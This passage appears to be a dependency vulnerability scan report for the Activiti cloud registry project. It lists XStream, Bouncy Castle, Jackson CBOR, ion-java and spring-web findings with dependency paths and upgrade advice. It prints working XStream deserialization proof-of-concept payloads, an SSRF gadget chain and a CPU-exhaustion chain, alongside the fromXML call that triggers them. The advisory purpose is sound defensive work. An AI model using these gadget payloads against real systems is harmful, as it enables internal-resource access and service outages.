  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Remote Code Execution (RCE) vulnerability report

high severity

Server-Side Request Forgery (SSRF)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
                          <class>jdk.nashorn.internal.runtime.Source</class>
                          <name>readFully</name>
                          <parameter-types>
                            <class>java.net.URL</class>
                          </parameter-types>
                        </method>
                      </val_-setter>
                      <outer-class>
                        <propertySetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field>
                                <name>serialPersistentFields</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>java.util.Comparator</type>
                              <field>
                                <name>CASE_INSENSITIVE_ORDER</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>long</type>
                              <field>
                                <name>serialVersionUID</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[C</type>
                              <field>
                                <name>value</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>int</type>
                              <field reference='../../../../../val_-getter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                        </propertySetters>
                        <propertyGetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>java.util.Comparator</type>
                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>long</type>
                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[C</type>
                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
                          </entry>
                        </propertyGetters>
                        <elementLocalNameCollision>false</elementLocalNameCollision>
                        <contentClass>java.lang.String</contentClass>
                        <elementDeclaredTypes/>
                      </outer-class>
                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                  </accessors>
                  <wrapper>java.lang.Object</wrapper>
                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
                  <dynamicWrapper>false</dynamicWrapper>
                </bodyBuilder>
                <isOneWay>false</isOneWay>
              </com.sun.xml.internal.ws.client.sei.StubHandler>
            </entry>
          </stubHandlers>
          <clientConfig>false</clientConfig>
        </databinding>
        <methodHandlers>
          <entry>
            <method reference='../../../databinding/stubHandlers/entry/method'/>
            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
              <owner reference='../../../..'/>
              <method reference='../../../../databinding/stubHandlers/entry/method'/>
              <isVoid>false</isVoid>
              <isOneway>false</isOneway>
            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
          </entry>
        </methodHandlers>
      </handler>
    </dynamic-proxy>
    <url>http://localhost:8080/internal/</url>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Server-Side Request Forgery (SSRF) vulnerability report

high severity
new

Timing Attack

  • Vulnerable module: org.bouncycastle:bcprov-jdk18on
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3 and org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81

Overview

Affected versions of this package are vulnerable to Timing Attack through the sample and sample_matrix functions in FrodoEngine.java. An attacker can recover information about the sampled noise values by observing how long Frodo key generation or encapsulation takes when it processes attacker-influenced inputs. The variable-time comparison and sign handling in the error sampler leak the distribution of the generated samples, weakening the secrecy of the private Frodo noise and enabling key-recovery attacks against affected deployments.

Remediation

Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.

References

Timing Attack vulnerability report

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.dataformat:jackson-dataformat-cbor
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.dataformat:jackson-dataformat-cbor to version 2.11.4, 2.12.1 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.19 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <is class='java.io.ByteArrayInputStream'>
            <buf></buf>
            <pos>-2147483648</pos>
            <mark>0</mark>
            <count>0</count>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: software.amazon.ion:ion-java
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 software.amazon.ion:ion-java@1.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 software.amazon.ion:ion-java@1.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 software.amazon.ion:ion-java@1.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 software.amazon.ion:ion-java@1.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 software.amazon.ion:ion-java@1.0.2

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the deserialization of Ion text encoded data or the IonValue model processing. An attacker can cause a StackOverflowError by crafting malicious Ion data that triggers excessive resource consumption when loaded or processed. This is only exploitable if the application deserializes Ion data from an untrusted source or data that could have been tampered with.

Notes:

According to the README.md file of this package, its domain changed from software.amazon.ion to com.amazon.ion. Please be aware that this vulnerability affects versions of both domains of this package.

For a fix, please check the advisory on the maintained package.

Workaround

This vulnerability can be mitigated by not loading data from untrusted sources or that could have been tampered with.

Remediation

A fix was pushed into the master branch but not yet published.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Incomplete Cleanup

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@4.1.0-RC1, org.springframework.cloud:spring-cloud-starter-config@5.0.3 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
